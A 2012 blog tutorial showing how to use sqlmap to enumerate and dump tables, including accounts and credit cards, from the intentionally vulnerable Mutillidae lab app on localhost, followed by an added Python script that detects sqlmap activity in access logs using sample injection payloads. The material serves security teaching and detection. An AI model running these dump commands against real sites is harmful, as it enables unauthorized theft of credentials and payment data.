Saturday, April 07, 2012

Dumping Like a Boss - sqlmap 101


sqlmap is one of the most commonly used tools for web application penetration testing because it is open source and automates SQL injection attacks, including spawning a shell on the database host. It fully supports MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems (DBMSs). It is written in Python.

To see all the attributes and options of this tool, type sqlmap -h in your terminal.

Suppose we have found a vulnerable link. After confirming it, we append --dbs to the target URL to enumerate the databases:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dbs

After that we should see the back-end DBMS, the web server and, most importantly, the databases:


Databases enumerated:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10

Now let's list all the tables in the owasp10 database, which is the database of the Mutillidae web application.

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 --tables


Tables enumerated:
+----------------+
| accounts       |
| blogs_table    |
| captured_data  |
| credit_cards   |
| hitlog         |
| pen_test_tools |
+----------------+


Now let's dump all the columns of the accounts table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T accounts --dump


Right, we got the columns cid, mysignature, password and username =)

Equivalent query: SELECT * FROM accounts;

Now let's try dumping the credit_cards table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T credit_cards --dump


Equivalent query: SELECT * FROM credit_cards;
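From the defender's side, the same sqlmap run leaves a clear trail in the web server's access log. The script below is an added example, not code from the original post or from the sqlmap project: it parses combined-format access-log lines and flags the Mutillidae user-info.php endpoint being probed, using two assumed signals, sqlmap's default User-Agent string and several distinct quote- or keyword-bearing values sent in one parameter from one client. The log lines are constructed samples.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# "combined" log format: ip ident user [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Assumed signals: sqlmap's default User-Agent, and SQL metacharacters/keywords inside a parameter value.
SQLI_MARKERS = re.compile(r"('|--|/\*|\bunion\b|\bselect\b|\bsleep\s*\()", re.IGNORECASE)
DISTINCT_VALUE_THRESHOLD = 3   # distinct marker-bearing values of one parameter from one IP

# Constructed sample log: one normal visit, then a sqlmap run against the same endpoint, then junk.
BASE = "/mutillidae/index.php?page=user-info.php&username=%s&password=&user-info-php-submit-button=View+Account+Details"
SQLMAP_UA = "sqlmap/1.0-dev (http://sqlmap.org)"   # assumed default UA string
def _line(ip, value, ua):
    return '%s - - [07/Apr/2012:10:00:01 +0800] "GET %s HTTP/1.1" 200 5120 "-" "%s"' % (ip, BASE % value, ua)
SAMPLE_LOG = [
    _line("10.0.0.5", "admin", "Mozilla/5.0"),
    _line("10.0.0.9", "admin%27", SQLMAP_UA),
    _line("10.0.0.9", "admin%27%20AND%201%3D1%20--%20", SQLMAP_UA),
    _line("10.0.0.9", "admin%27%20UNION%20SELECT%20NULL%2CNULL--%20", SQLMAP_UA),
    "garbage line that does not parse",
]

def parse_line(line):
    """Split one combined-format line into ip, user-agent, path and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("path"))
    return {"ip": m.group("ip"), "ua": m.group("ua"), "path": url.path,
            "params": parse_qs(url.query, keep_blank_values=True)}

def detect_sqlmap_activity(lines):
    """Return (ip, path, reason) findings: a UA match, or repeated injection-style values in a parameter."""
    findings, ua_seen = [], set()
    probes = defaultdict(set)   # (ip, path, param) -> distinct values carrying SQL markers
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue   # malformed lines are skipped, not fatal
        if "sqlmap" in rec["ua"].lower() and rec["ip"] not in ua_seen:
            ua_seen.add(rec["ip"])
            findings.append((rec["ip"], rec["path"], "sqlmap user-agent"))
        for name, values in rec["params"].items():
            probes[(rec["ip"], rec["path"], name)].update(v for v in values if SQLI_MARKERS.search(v))
    for (ip, path, name), values in probes.items():
        if len(values) >= DISTINCT_VALUE_THRESHOLD:
            findings.append((ip, path, "%d injection-style values in parameter '%s'" % (len(values), name)))
    return findings
```

Note that the User-Agent check alone is weak, since sqlmap can send a custom one; the per-parameter value count is the signal that survives that.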

Well, that should be it! I hope this showed you how to use sqlmap to dump the tables of a given database.


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security. He encourages other like-minded individuals to come forward and share their knowledge through blogging right here in the ROOTCON Blog section.

ROOTCON is managed by like-minded InfoSec professionals across the Philippines. All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.